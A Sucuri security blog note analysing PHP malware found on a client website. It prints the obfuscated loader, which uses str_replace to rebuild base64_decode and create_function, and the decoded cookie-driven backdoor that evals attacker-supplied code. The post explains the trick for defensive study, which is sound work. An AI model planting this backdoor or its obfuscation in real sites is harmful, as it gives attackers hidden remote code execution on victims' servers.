• Skip to primary navigation
  • Skip to content
  • Skip to primary sidebar
  • Skip to footer

Sucuri Blog

Website Security News

  • Products
    • Website Security Platform
    • Website Firewall (WAF)
    • Enterprise Website Security
    • Multisite Solutions
  • Features
    • Detection
    • Protection
    • Performance
    • Response
    • Backups
  • Partners
    • Agency Solutions
    • Partners
    • Referral Program
    • Ecommerce
  • Resources
    • Guides
    • Webinars
    • Infographics
    • SiteCheck
    • Reports
    • Email Courses
  • Immediate Help
  • Login
Labs Note

PHP str_replace to hide malware

January 3, 2014Ante Kresic

FacebookTwitterSubscribe

We found another interesting piece of PHP-based malware on a client site a few days ago:

$exg="JGMnd9J2NvdW50JzskYTnd0kX0ndNPndT0tJRTtpZihyZXNldCgkndYSk9PSdtandCcgJndiYgJGMondJGEpPjM";
$iyo="GxhndY2UndoYXJyYndXkoJy9bndXlndx3PVxzXS8nLndCcvXHMvndJyksIGFyndcmF5KCcnLCcrJyk";
$ts = str_replace("b","","bsbtr_brbepblabcbe");
$fy="sIGpndvaW4oYXJyYXlfc2xpY2UoJndGEndsJGMoJGEpLTndMpKndSkpKTtlYnd2hvICc8LycuJGsnduJz4nO30=";
$sjb="peyRrPSndd1nddGU0bndSc7ZWNobyAnPCcnduJGsundJz4nO2ndV2YWwoYmFzZndTY0X2RlY29kZShwcmVnX3Jlc";
$dzy = $ts("er", "", "erberaersereer6er4er_dereercerodere");
$mc = $ts("y","","ycyryeyaytye_yfyuynctyiyoyn");
$tha = $mc('', $dzy($ts("nd", "", $exg.$sjb.$iyo.$fy))); $tha();

Can you decode and see what it is doing? ..

This piece of code tries to obfuscate all the functions that could be flagged by a scanner using a benign php function called str_replace. This function replaces all instances of a string with a replacement in the subject. So, for example, the next line:

----- $ts = str_replace("b","","bsbtr_brbepblabcbe"); ----- 

Replaces all instances of character \’b\’ with nothing. So from bsbtr_brbepblabcbe we get str_replace. Using the same technique, we have some more functions:

----- $dzy = $ts("er", "", "erberaersereer6er4er_dereercerodere"); //base64_decode $mc = $ts("y","","ycyryeyaytye_yfyuynctyiyoyn"); //create_function ----- 

All this for creating a function and running it in this line:

----- $tha = $mc('', $dzy($ts("nd", "", $exg.$sjb.$iyo.$fy))); $tha(); ----- 

Function code is contained in the next expression:

----- $dzy($ts("nd", "", $exg.$sjb.$iyo.$fy)); ----- 

And the final code is:

$c = "count";
$a = $_COOKIE;
if (reset($a) == 'mh' && $c($a) > 3) {
    $k = 'ute4m';
    echo '<' . $k . '>';
    eval (base64_decode (preg_replace(array(
        '/[^\w=\s]/',
        '/\s/'
    ), array(
        '',
        '+'
    ), join(array_slice($a, $c($a) - 3)))));
    echo '</' . $k . '>';
}

What it does? It uses some simple tricks to edit the contents of the cookie, decode it from base64 and eval (execute) that malicious code.

FacebookTwitterSubscribe

Categories: Sucuri LabsTags: Labs Note

About Ante Kresic

Reader Interactions

Primary Sidebar

Socialize With Sucuri

We're actively engaged across multiple platforms. Follow us and let's connect!

  • Facebook
  • Twitter
  • LinkedIn
  • YouTube
  • Instagram
  • RSS Feed

Join Over 20,000 Subscribers!

Sucuri Sidebar Malware Removal to Signup Page

Footer

Products

  • Website Firewall
  • Website AntiVirus
  • Website Backups
  • WordPress Security
  • Enterprise Services

Solutions

  • DDos Protection
  • Malware Detection
  • Malware Removal
  • Malware Prevention
  • Blacklist Removal

Support

  • Blog
  • Knowledge Base
  • SiteCheck
  • Research Labs
  • FAQ

Company

  • About
  • Media
  • Events
  • Employment
  • Contact
  • Testimonials
  • Facebook
  • Twitter
  • LinkedIn
  • Instagram

Customer Login

Sucuri Home

  • Terms of Use
  • Privacy Policy
  • Frequently Asked Questions

© 2023 Sucuri Inc. All rights reserved

Sucuri Cookie Policy
See our policy>>

Our website uses cookies, which help us to improve our site and enables us to deliver the best possible service and customer experience.